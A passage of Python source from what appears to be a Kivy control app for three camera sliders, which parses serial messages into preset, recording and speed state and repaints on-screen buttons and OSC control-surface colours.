elif msg[1:4] == "111": # Cam 1 Set Pos 1
cam1Pos1Set = True
elif msg[1:4] == "121":
cam1Pos2Set = True
elif msg[1:4] == "131":
cam1Pos3Set = True
elif msg[1:4] == "141":
cam1Pos4Set = True
elif msg[1:4] == "151":
cam1Pos5Set = True
elif msg[1:4] == "161":
cam1Pos6Set = True
elif msg[1:4] == "112":
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
cam1Pos1Run = True
elif msg[1:4] == "122":
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
cam1Pos2Run = True
elif msg[1:4] == "132":
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
cam1Pos3Run = True
elif msg[1:4] == "142":
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
cam1Pos4Run = True
elif msg[1:4] == "152":
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
cam1Pos5Run = True
elif msg[1:4] == "162":
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
cam1Pos6Run = True
elif msg[1:4] == "113":
cam1Pos1Run = False
cam1AtPos1 = True
elif msg[1:4] == "123":
cam1Pos2Run = False
cam1AtPos2 = True
elif msg[1:4] == "133":
cam1Pos3Run = False
cam1AtPos3 = True
elif msg[1:4] == "143":
cam1Pos4Run = False
cam1AtPos4 = True
elif msg[1:4] == "153":
cam1Pos5Run = False
cam1AtPos5 = True
elif msg[1:4] == "163":
cam1Pos6Run = False
cam1AtPos6 = True
elif msg[1:4] == "114":
cam1isRecording = False
self.root.ids.cam1Record.background_color = get_color_from_hex("#666666")
self.root.ids.cam1Record.text = "Record"
client.send_message("/style/bgcolor/4/16", [50, 50, 50])
elif msg[1:4] == "124":
cam1isRecording = True
self.root.ids.cam1Record.background_color = get_color_from_hex("#7D0000")
self.root.ids.cam1Record.text = "Recording"
client.send_message("/style/bgcolor/4/16", [225, 0, 0])
elif msg[1:4] == "100":
cam1Pos1Run = False
cam1Pos1Set = False
cam1AtPos1 = False
cam1Pos2Run = False
cam1Pos2Set = False
cam1AtPos2 = False
cam1Pos3Run = False
cam1Pos3Set = False
cam1AtPos3 = False
cam1Pos4Run = False
cam1Pos4Set = False
cam1AtPos4 = False
cam1Pos5Run = False
cam1Pos5Set = False
cam1AtPos5 = False
cam1Pos6Run = False
cam1Pos6Set = False
cam1AtPos6 = False
elif msg[1:4] == "211": # Cam 2 Set Pos 1
cam2Pos1Set = True
elif msg[1:4] == "221":
cam2Pos2Set = True
elif msg[1:4] == "231":
cam2Pos3Set = True
elif msg[1:4] == "241":
cam2Pos4Set = True
elif msg[1:4] == "251":
cam2Pos5Set = True
elif msg[1:4] == "261":
cam2Pos6Set = True
elif msg[1:4] == "212":
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
cam2Pos1Run = True
elif msg[1:4] == "222":
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
cam2Pos2Run = True
elif msg[1:4] == "232":
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
cam2Pos3Run = True
elif msg[1:4] == "242":
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
cam2Pos4Run = True
elif msg[1:4] == "252":
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
cam2Pos5Run = True
elif msg[1:4] == "262":
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
cam2Pos6Run = True
elif msg[1:4] == "213":
cam2Pos1Run = False
cam2AtPos1 = True
elif msg[1:4] == "223":
cam2Pos2Run = False
cam2AtPos2 = True
elif msg[1:4] == "233":
cam2Pos3Run = False
cam2AtPos3 = True
elif msg[1:4] == "243":
cam2Pos4Run = False
cam2AtPos4 = True
elif msg[1:4] == "253":
cam2Pos5Run = False
cam2AtPos5 = True
elif msg[1:4] == "263":
cam2Pos6Run = False
cam2AtPos6 = True
elif msg[1:4] == "214":
cam2isRecording = False
self.root.ids.cam2Record.background_color = get_color_from_hex("#666666")
self.root.ids.cam2Record.text = "Record"
client.send_message("/style/bgcolor/5/16", [50, 50, 50])
elif msg[1:4] == "224":
cam2isRecording = True
self.root.ids.cam2Record.background_color = get_color_from_hex("#7D0000")
self.root.ids.cam2Record.text = "Recording"
client.send_message("/style/bgcolor/5/16", [225, 0, 0])
elif msg[1:4] == "200":
cam2Pos1Run = False
cam2Pos1Set = False
cam2AtPos1 = False
cam2Pos2Run = False
cam2Pos2Set = False
cam2AtPos2 = False
cam2Pos3Run = False
cam2Pos3Set = False
cam2AtPos3 = False
cam2Pos4Run = False
cam2Pos4Set = False
cam2AtPos4 = False
cam2Pos5Run = False
cam2Pos5Set = False
cam2AtPos5 = False
cam2Pos6Run = False
cam2Pos6Set = False
cam2AtPos6 = False
elif msg[1:4] == "311": # Cam 3 Set Pos 1
cam3Pos1Set = True
elif msg[1:4] == "321":
cam3Pos2Set = True
elif msg[1:4] == "331":
cam3Pos3Set = True
elif msg[1:4] == "341":
cam3Pos4Set = True
elif msg[1:4] == "351":
cam3Pos5Set = True
elif msg[1:4] == "361":
cam3Pos6Set = True
elif msg[1:4] == "312":
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
cam3Pos1Run = True
elif msg[1:4] == "322":
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
cam3Pos2Run = True
elif msg[1:4] == "332":
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
cam3Pos3Run = True
elif msg[1:4] == "342":
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
cam3Pos4Run = True
elif msg[1:4] == "352":
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
cam3Pos5Run = True
elif msg[1:4] == "362":
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
cam3Pos6Run = True
elif msg[1:4] == "313":
cam3Pos1Run = False
cam3AtPos1 = True
elif msg[1:4] == "323":
cam3Pos2Run = False
cam3AtPos2 = True
elif msg[1:4] == "333":
cam3Pos3Run = False
cam3AtPos3 = True
elif msg[1:4] == "343":
cam3Pos4Run = False
cam3AtPos4 = True
elif msg[1:4] == "353":
cam3Pos5Run = False
cam3AtPos5 = True
elif msg[1:4] == "363":
cam3Pos6Run = False
cam3AtPos6 = True
elif msg[1:4] == "300":
cam3Pos1Run = False
cam3Pos1Set = False
cam3AtPos1 = False
cam3Pos2Run = False
cam3Pos2Set = False
cam3AtPos2 = False
cam3Pos3Run = False
cam3Pos3Set = False
cam3AtPos3 = False
cam3Pos4Run = False
cam3Pos4Set = False
cam3AtPos4 = False
cam3Pos5Run = False
cam3Pos5Set = False
cam3AtPos5 = False
cam3Pos6Run = False
cam3Pos6Set = False
cam3AtPos6 = False
elif msg[1:4] == "314":
cam3isRecording = False
self.root.ids.cam3Record.background_color = get_color_from_hex("#666666")
self.root.ids.cam3Record.text = "Record"
client.send_message("/style/bgcolor/6/16", [50, 50, 50])
elif msg[1:4] == "324":
cam3isRecording = True
self.root.ids.cam3Record.background_color = get_color_from_hex("#7D0000")
self.root.ids.cam3Record.text = "Recording"
client.send_message("/style/bgcolor/6/16", [225, 0, 0])
elif msg[1] == "?":
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
elif msg[1] == "!":
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
elif msg[1] == "@":
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
elif msg[0:2] == "=1":
cam1SliderSpeed = int(msg[2])
elif msg[0:2] == "=2":
cam2SliderSpeed = int(msg[2])
elif msg[0:2] == "=3":
cam3SliderSpeed = int(msg[2])
elif msg[0:3] == "=@1":
cam1PTSpeed = int(msg[3])
elif msg[0:3] == "=@2":
cam2PTSpeed = int(msg[3])
elif msg[0:3] == "=@3":
cam3PTSpeed = int(msg[3])
elif msg[0:2] == "#$":
return
elif msg[0:4] == "Cam1":
whichCamRead = 1
self.root.ids.txtInput_read.text += ("[color=" + Cam1TextColour + "]" + msg + "[/color]")
self.root.ids.scroll_view.scroll_y = 0
elif msg[0:4] == "Cam2":
whichCamRead = 2
self.root.ids.txtInput_read.text += ("[color=" + Cam2TextColour + "]" + msg + "[/color]")
self.root.ids.scroll_view.scroll_y = 0
elif msg[0:4] == "Cam3":
whichCamRead = 3
self.root.ids.txtInput_read.text += ("[color=" + Cam3TextColour + "]" + msg + "[/color]")
self.root.ids.scroll_view.scroll_y = 0
else:
if whichCamRead == 1:
self.root.ids.txtInput_read.text += ("[color=" + Cam1TextColour + "]" + msg + "[/color]")
self.root.ids.scroll_view.scroll_y = 0
elif whichCamRead == 2:
self.root.ids.txtInput_read.text += ("[color=" + Cam2TextColour + "]" + msg + "[/color]")
self.root.ids.scroll_view.scroll_y = 0
elif whichCamRead == 3:
self.root.ids.txtInput_read.text += ("[color=" + Cam3TextColour + "]" + msg + "[/color]")
self.root.ids.scroll_view.scroll_y = 0
else:
self.root.ids.txtInput_read.text += ("[color=ffffff]") + msg + ("[/color]")
self.root.ids.scroll_view.scroll_y = 0
msg = ''
self.doButtonColours()
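# Force every button/OSC indicator to be repainted on the next doButtonColours() pass.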
def resetButtonColours(self):
global resetButtons
resetButtons = True
self.doButtonColours()
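# doButtonColours() pushes the cached preset/speed state to the Kivy buttons and to the
# external OSC control surface (client.send_message). Each widget is only repainted when
# its state differs from the OLD* copy taken on the previous call, or when resetButtons is set.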
def doButtonColours(self):
global cam1AtPos1
global cam1AtPos2
global cam1AtPos3
global cam1AtPos4
global cam1AtPos5
global cam1AtPos6
global cam1Pos1Set
global cam1Pos2Set
global cam1Pos3Set
global cam1Pos4Set
global cam1Pos5Set
global cam1Pos6Set
global cam1Pos1Run
global cam1Pos2Run
global cam1Pos3Run
global cam1Pos4Run
global cam1Pos5Run
global cam1Pos6Run
global OLDcam1AtPos1
global OLDcam1AtPos2
global OLDcam1AtPos3
global OLDcam1AtPos4
global OLDcam1AtPos5
global OLDcam1AtPos6
global OLDcam1Pos1Set
global OLDcam1Pos2Set
global OLDcam1Pos3Set
global OLDcam1Pos4Set
global OLDcam1Pos5Set
global OLDcam1Pos6Set
global OLDcam1Pos1Run
global OLDcam1Pos2Run
global OLDcam1Pos3Run
global OLDcam1Pos4Run
global OLDcam1Pos5Run
global OLDcam1Pos6Run
global cam1isRecording
global cam1isZooming
global cam2AtPos1
global cam2AtPos2
global cam2AtPos3
global cam2AtPos4
global cam2AtPos5
global cam2AtPos6
global cam2Pos1Set
global cam2Pos2Set
global cam2Pos3Set
global cam2Pos4Set
global cam2Pos5Set
global cam2Pos6Set
global cam2Pos1Run
global cam2Pos2Run
global cam2Pos3Run
global cam2Pos4Run
global cam2Pos5Run
global cam2Pos6Run
global OLDcam2AtPos1
global OLDcam2AtPos2
global OLDcam2AtPos3
global OLDcam2AtPos4
global OLDcam2AtPos5
global OLDcam2AtPos6
global OLDcam2Pos1Set
global OLDcam2Pos2Set
global OLDcam2Pos3Set
global OLDcam2Pos4Set
global OLDcam2Pos5Set
global OLDcam2Pos6Set
global OLDcam2Pos1Run
global OLDcam2Pos2Run
global OLDcam2Pos3Run
global OLDcam2Pos4Run
global OLDcam2Pos5Run
global OLDcam2Pos6Run
global cam2isRecording
global cam2isZooming
global cam3AtPos1
global cam3AtPos2
global cam3AtPos3
global cam3AtPos4
global cam3AtPos5
global cam3AtPos6
global cam3Pos1Set
global cam3Pos2Set
global cam3Pos3Set
global cam3Pos4Set
global cam3Pos5Set
global cam3Pos6Set
global cam3Pos1Run
global cam3Pos2Run
global cam3Pos3Run
global cam3Pos4Run
global cam3Pos5Run
global cam3Pos6Run
global OLDcam3AtPos1
global OLDcam3AtPos2
global OLDcam3AtPos3
global OLDcam3AtPos4
global OLDcam3AtPos5
global OLDcam3AtPos6
global OLDcam3Pos1Set
global OLDcam3Pos2Set
global OLDcam3Pos3Set
global OLDcam3Pos4Set
global OLDcam3Pos5Set
global OLDcam3Pos6Set
global OLDcam3Pos1Run
global OLDcam3Pos2Run
global OLDcam3Pos3Run
global OLDcam3Pos4Run
global OLDcam3Pos5Run
global OLDcam3Pos6Run
global cam3isRecording
global cam3isZooming
global cam1SliderSpeed
global cam2SliderSpeed
global cam3SliderSpeed
global oldCam1Speed
global oldCam2Speed
global oldCam3Speed
global cam1PTSpeed
global cam2PTSpeed
global cam3PTSpeed
global oldCam1PTSpeed
global oldCam2PTSpeed
global oldCam3PTSpeed
global moveType
global moveTypeOld
global resetButtons
if (moveType == 1) and ((moveTypeOld != moveType) or resetButtons):
moveTypeOld = moveType
client.send_message("/style/bgcolor/4/12", [0, 200, 0])
client.send_message("/style/bgcolor/5/12", [0, 200, 0])
client.send_message("/style/bgcolor/6/12", [0, 200, 0])
client.send_message("/style/bgcolor/4/20", [0, 50, 0])
client.send_message("/style/bgcolor/5/20", [0, 50, 0])
client.send_message("/style/bgcolor/6/20", [0, 50, 0])
client.send_message("/style/bgcolor/4/28", [0, 50, 0])
client.send_message("/style/bgcolor/5/28", [0, 50, 0])
client.send_message("/style/bgcolor/6/28", [0, 50, 0])
elif (moveType == 2) and ((moveTypeOld != moveType) or resetButtons):
moveTypeOld = moveType
client.send_message("/style/bgcolor/4/12", [0, 50, 0])
client.send_message("/style/bgcolor/5/12", [0, 50, 0])
client.send_message("/style/bgcolor/6/12", [0, 50, 0])
client.send_message("/style/bgcolor/4/20", [0, 200, 0])
client.send_message("/style/bgcolor/5/20", [0, 200, 0])
client.send_message("/style/bgcolor/6/20", [0, 200, 0])
client.send_message("/style/bgcolor/4/28", [0, 50, 0])
client.send_message("/style/bgcolor/5/28", [0, 50, 0])
client.send_message("/style/bgcolor/6/28", [0, 50, 0])
elif (moveType == 3) and ((moveTypeOld != moveType) or resetButtons):
moveTypeOld = moveType
client.send_message("/style/bgcolor/4/12", [0, 50, 0])
client.send_message("/style/bgcolor/5/12", [0, 50, 0])
client.send_message("/style/bgcolor/6/12", [0, 50, 0])
client.send_message("/style/bgcolor/4/20", [0, 50, 0])
client.send_message("/style/bgcolor/5/20", [0, 50, 0])
client.send_message("/style/bgcolor/6/20", [0, 50, 0])
client.send_message("/style/bgcolor/4/28", [0, 200, 0])
client.send_message("/style/bgcolor/5/28", [0, 200, 0])
client.send_message("/style/bgcolor/6/28", [0, 200, 0])
if cam1Pos1Set != OLDcam1Pos1Set or cam1Pos1Run != OLDcam1Pos1Run or cam1AtPos1 != OLDcam1AtPos1 or resetButtons:
OLDcam1Pos1Set = cam1Pos1Set
OLDcam1Pos1Run = cam1Pos1Run
OLDcam1AtPos1 = cam1AtPos1
if cam1Pos1Set and not cam1Pos1Run and not cam1AtPos1: # Set, not Run or At
self.root.ids.btnCam1Go1.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/1", [18, 70, 19])
client.send_message("/style/color/3/1", [255, 0, 0])
client.send_message("/style/bgcolor/4/1", [18, 70, 19])
client.send_message("/style/color/4/1", [255, 0, 0])
elif cam1Pos1Set and not cam1Pos1Run and cam1AtPos1: # Set & At, not Run
self.root.ids.btnCam1Go1.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/1", [48, 186, 49])
client.send_message("/style/color/3/1", [255, 255, 255])
client.send_message("/style/bgcolor/4/1", [48, 186, 49])
client.send_message("/style/color/4/1", [255, 255, 255])
elif not cam1Pos1Set:
self.root.ids.btnCam1Go1.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/1", [18, 70, 19])
client.send_message("/style/color/3/1", [0, 0, 0])
client.send_message("/style/bgcolor/4/1", [18, 70, 19])
client.send_message("/style/color/4/1", [0, 0, 0])
if cam1Pos2Set != OLDcam1Pos2Set or cam1Pos2Run != OLDcam1Pos2Run or cam1AtPos2 != OLDcam1AtPos2 or resetButtons:
OLDcam1Pos2Set = cam1Pos2Set
OLDcam1Pos2Run = cam1Pos2Run
OLDcam1AtPos2 = cam1AtPos2
if cam1Pos2Set and not cam1Pos2Run and not cam1AtPos2: # Position LEDs Cam1
self.root.ids.btnCam1Go2.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/2", [18, 70, 19])
client.send_message("/style/color/3/2", [255, 0, 0])
client.send_message("/style/bgcolor/4/2", [18, 70, 19])
client.send_message("/style/color/4/2", [255, 0, 0])
elif cam1Pos2Set and not cam1Pos2Run and cam1AtPos2:
self.root.ids.btnCam1Go2.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/2", [48, 186, 49])
client.send_message("/style/color/3/2", [255, 255, 255])
client.send_message("/style/bgcolor/4/2", [48, 186, 49])
client.send_message("/style/color/4/2", [255, 255, 255])
elif not cam1Pos2Set:
self.root.ids.btnCam1Go2.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/2", [18, 70, 19])
client.send_message("/style/color/3/2", [0, 0, 0])
client.send_message("/style/bgcolor/4/2", [18, 70, 19])
client.send_message("/style/color/4/2", [0, 0, 0])
if cam1Pos3Set != OLDcam1Pos3Set or cam1Pos3Run != OLDcam1Pos3Run or cam1AtPos3 != OLDcam1AtPos3 or resetButtons:
OLDcam1Pos3Set = cam1Pos3Set
OLDcam1Pos3Run = cam1Pos3Run
OLDcam1AtPos3 = cam1AtPos3
if cam1Pos3Set and not cam1Pos3Run and not cam1AtPos3: # Position LEDs Cam1
self.root.ids.btnCam1Go3.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/3", [18, 70, 19])
client.send_message("/style/color/3/3", [255, 0, 0])
client.send_message("/style/bgcolor/4/3", [18, 70, 19])
client.send_message("/style/color/4/3", [255, 0, 0])
elif cam1Pos3Set and not cam1Pos3Run and cam1AtPos3:
self.root.ids.btnCam1Go3.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/3", [48, 186, 49])
client.send_message("/style/color/3/3", [255, 255, 255])
client.send_message("/style/bgcolor/4/3", [48, 186, 49])
client.send_message("/style/color/4/3", [255, 255, 255])
elif not cam1Pos3Set:
self.root.ids.btnCam1Go3.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/3", [18, 70, 19])
client.send_message("/style/color/3/3", [0, 0, 0])
client.send_message("/style/bgcolor/4/3", [18, 70, 19])
client.send_message("/style/color/4/3", [0, 0, 0])
if cam1Pos4Set != OLDcam1Pos4Set or cam1Pos4Run != OLDcam1Pos4Run or cam1AtPos4 != OLDcam1AtPos4 or resetButtons:
OLDcam1Pos4Set = cam1Pos4Set
OLDcam1Pos4Run = cam1Pos4Run
OLDcam1AtPos4 = cam1AtPos4
if cam1Pos4Set and not cam1Pos4Run and not cam1AtPos4: # Position LEDs Cam1
self.root.ids.btnCam1Go4.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/4", [18, 70, 19])
client.send_message("/style/color/3/4", [255, 0, 0])
client.send_message("/style/bgcolor/4/4", [18, 70, 19])
client.send_message("/style/color/4/4", [255, 0, 0])
elif cam1Pos4Set and not cam1Pos4Run and cam1AtPos4:
self.root.ids.btnCam1Go4.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/4", [48, 186, 49])
client.send_message("/style/color/3/4", [255, 255, 255])
client.send_message("/style/bgcolor/4/4", [48, 186, 49])
client.send_message("/style/color/4/4", [255, 255, 255])
elif not cam1Pos4Set:
self.root.ids.btnCam1Go4.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/4", [18, 70, 19])
client.send_message("/style/color/3/4", [0, 0, 0])
client.send_message("/style/bgcolor/4/4", [18, 70, 19])
client.send_message("/style/color/4/4", [0, 0, 0])
if cam1Pos5Set != OLDcam1Pos5Set or cam1Pos5Run != OLDcam1Pos5Run or cam1AtPos5 != OLDcam1AtPos5 or resetButtons:
OLDcam1Pos5Set = cam1Pos5Set
OLDcam1Pos5Run = cam1Pos5Run
OLDcam1AtPos5 = cam1AtPos5
if cam1Pos5Set and not cam1Pos5Run and not cam1AtPos5: # Position LEDs Cam1
self.root.ids.btnCam1Go5.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/5", [18, 70, 19])
client.send_message("/style/color/3/5", [255, 0, 0])
client.send_message("/style/bgcolor/4/5", [18, 70, 19])
client.send_message("/style/color/4/5", [255, 0, 0])
elif cam1Pos5Set and not cam1Pos5Run and cam1AtPos5:
self.root.ids.btnCam1Go5.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/5", [48, 186, 49])
client.send_message("/style/color/3/5", [255, 255, 255])
client.send_message("/style/bgcolor/4/5", [48, 186, 49])
client.send_message("/style/color/4/5", [255, 255, 255])
elif not cam1Pos5Set:
self.root.ids.btnCam1Go5.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/5", [18, 70, 19])
client.send_message("/style/color/3/5", [0, 0, 0])
client.send_message("/style/bgcolor/4/5", [18, 70, 19])
client.send_message("/style/color/4/5", [0, 0, 0])
if cam1Pos6Set != OLDcam1Pos6Set or cam1Pos6Run != OLDcam1Pos6Run or cam1AtPos6 != OLDcam1AtPos6 or resetButtons:
OLDcam1Pos6Set = cam1Pos6Set
OLDcam1Pos6Run = cam1Pos6Run
OLDcam1AtPos6 = cam1AtPos6
if cam1Pos6Set and not cam1Pos6Run and not cam1AtPos6: # Position LEDs Cam1
self.root.ids.btnCam1Go6.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/6", [18, 70, 19])
client.send_message("/style/color/3/6", [255, 0, 0])
client.send_message("/style/bgcolor/4/6", [18, 70, 19])
client.send_message("/style/color/4/6", [255, 0, 0])
elif cam1Pos6Set and not cam1Pos6Run and cam1AtPos6:
self.root.ids.btnCam1Go6.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/6", [48, 186, 49])
client.send_message("/style/color/3/6", [255, 255, 255])
client.send_message("/style/bgcolor/4/6", [48, 186, 49])
client.send_message("/style/color/4/6", [255, 255, 255])
elif not cam1Pos6Set:
self.root.ids.btnCam1Go6.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/6", [18, 70, 19])
client.send_message("/style/color/3/6", [0, 0, 0])
client.send_message("/style/bgcolor/4/6", [18, 70, 19])
client.send_message("/style/color/4/6", [0, 0, 0])
if cam2Pos1Set != OLDcam2Pos1Set or cam2Pos1Run != OLDcam2Pos1Run or cam2AtPos1 != OLDcam2AtPos1 or resetButtons:
OLDcam2Pos1Set = cam2Pos1Set
OLDcam2Pos1Run = cam2Pos1Run
OLDcam2AtPos1 = cam2AtPos1
if cam2Pos1Set and not cam2Pos1Run and not cam2AtPos1: # Set, not Run or At
self.root.ids.btnCam2Go1.col=(1, 0, 0, 1)
#client.send_message("/Cam2Go1", [1, "00AAAAFF"])
client.send_message("/style/bgcolor/3/9", [35, 50, 70])
client.send_message("/style/color/3/9", [255, 0, 0])
client.send_message("/style/bgcolor/5/1", [35, 50, 70])
client.send_message("/style/color/5/1", [255, 0, 0])
elif cam2Pos1Set and not cam2Pos1Run and cam2AtPos1: # Set & At, not Run
self.root.ids.btnCam2Go1.col=(0, 1, 0, 1)
#client.send_message("/Cam2Go1", [1, "FFFF00FF"])
client.send_message("/style/bgcolor/3/9", [92, 133, 186])
client.send_message("/style/color/3/9", [255, 255, 255])
client.send_message("/style/bgcolor/5/1", [92, 133, 186])
client.send_message("/style/color/5/1", [255, 255, 255])
elif not cam2Pos1Set:
self.root.ids.btnCam2Go1.col=(.13, .13, .13, 1)
#client.send_message("/Cam2Go1", [0, "FFFF00FF"])
client.send_message("/style/bgcolor/3/9", [35, 50, 70])
client.send_message("/style/color/3/9", [0, 0, 0])
client.send_message("/style/bgcolor/5/1", [35, 50, 70])
client.send_message("/style/color/5/1", [0, 0, 0])
if cam2Pos2Set != OLDcam2Pos2Set or cam2Pos2Run != OLDcam2Pos2Run or cam2AtPos2 != OLDcam2AtPos2 or resetButtons:
OLDcam2Pos2Set = cam2Pos2Set
OLDcam2Pos2Run = cam2Pos2Run
OLDcam2AtPos2 = cam2AtPos2
if cam2Pos2Set and not cam2Pos2Run and not cam2AtPos2: # Position LEDs Cam2
self.root.ids.btnCam2Go2.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/10", [35, 50, 70])
client.send_message("/style/color/3/10", [255, 0, 0])
client.send_message("/style/bgcolor/5/2", [35, 50, 70])
client.send_message("/style/color/5/2", [255, 0, 0])
elif cam2Pos2Set and not cam2Pos2Run and cam2AtPos2:
self.root.ids.btnCam2Go2.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/10", [92, 133, 186])
client.send_message("/style/color/3/10", [255, 255, 255])
client.send_message("/style/bgcolor/5/2", [92, 133, 186])
client.send_message("/style/color/5/2", [255, 255, 255])
elif not cam2Pos2Set:
self.root.ids.btnCam2Go2.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/10", [35, 50, 70])
client.send_message("/style/color/3/10", [0, 0, 0])
client.send_message("/style/bgcolor/5/2", [35, 50, 70])
client.send_message("/style/color/5/2", [0, 0, 0])
if cam2Pos3Set != OLDcam2Pos3Set or cam2Pos3Run != OLDcam2Pos3Run or cam2AtPos3 != OLDcam2AtPos3 or resetButtons:
OLDcam2Pos3Set = cam2Pos3Set
OLDcam2Pos3Run = cam2Pos3Run
OLDcam2AtPos3 = cam2AtPos3
if cam2Pos3Set and not cam2Pos3Run and not cam2AtPos3: # Position LEDs Cam2
self.root.ids.btnCam2Go3.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/11", [35, 50, 70])
client.send_message("/style/color/3/11", [255, 0, 0])
client.send_message("/style/bgcolor/5/3", [35, 50, 70])
client.send_message("/style/color/5/3", [255, 0, 0])
elif cam2Pos3Set and not cam2Pos3Run and cam2AtPos3:
self.root.ids.btnCam2Go3.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/11", [92, 133, 186])
client.send_message("/style/color/3/11", [255, 255, 255])
client.send_message("/style/bgcolor/5/3", [92, 133, 186])
client.send_message("/style/color/5/3", [255, 255, 255])
elif not cam2Pos3Set:
self.root.ids.btnCam2Go3.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/11", [35, 50, 70])
client.send_message("/style/color/3/11", [0, 0, 0])
client.send_message("/style/bgcolor/5/3", [35, 50, 70])
client.send_message("/style/color/5/3", [0, 0, 0])
if cam2Pos4Set != OLDcam2Pos4Set or cam2Pos4Run != OLDcam2Pos4Run or cam2AtPos4 != OLDcam2AtPos4 or resetButtons:
OLDcam2Pos4Set = cam2Pos4Set
OLDcam2Pos4Run = cam2Pos4Run
OLDcam2AtPos4 = cam2AtPos4
if cam2Pos4Set and not cam2Pos4Run and not cam2AtPos4: # Position LEDs Cam2
self.root.ids.btnCam2Go4.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/12", [35, 50, 70])
client.send_message("/style/color/3/12", [255, 0, 0])
client.send_message("/style/bgcolor/5/4", [35, 50, 70])
client.send_message("/style/color/5/4", [255, 0, 0])
elif cam2Pos4Set and not cam2Pos4Run and cam2AtPos4:
self.root.ids.btnCam2Go4.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/12", [92, 133, 186])
client.send_message("/style/color/3/12", [255, 255, 255])
client.send_message("/style/bgcolor/5/4", [92, 133, 186])
client.send_message("/style/color/5/4", [255, 255, 255])
elif not cam2Pos4Set:
self.root.ids.btnCam2Go4.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/12", [35, 50, 70])
client.send_message("/style/color/3/12", [0, 0, 0])
client.send_message("/style/bgcolor/5/4", [35, 50, 70])
client.send_message("/style/color/5/4", [0, 0, 0])
if cam2Pos5Set != OLDcam2Pos5Set or cam2Pos5Run != OLDcam2Pos5Run or cam2AtPos5 != OLDcam2AtPos5 or resetButtons:
OLDcam2Pos5Set = cam2Pos5Set
OLDcam2Pos5Run = cam2Pos5Run
OLDcam2AtPos5 = cam2AtPos5
if cam2Pos5Set and not cam2Pos5Run and not cam2AtPos5: # Position LEDs Cam2
self.root.ids.btnCam2Go5.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/13", [35, 50, 70])
client.send_message("/style/color/3/13", [255, 0, 0])
client.send_message("/style/bgcolor/5/5", [35, 50, 70])
client.send_message("/style/color/5/5", [255, 0, 0])
elif cam2Pos5Set and not cam2Pos5Run and cam2AtPos5:
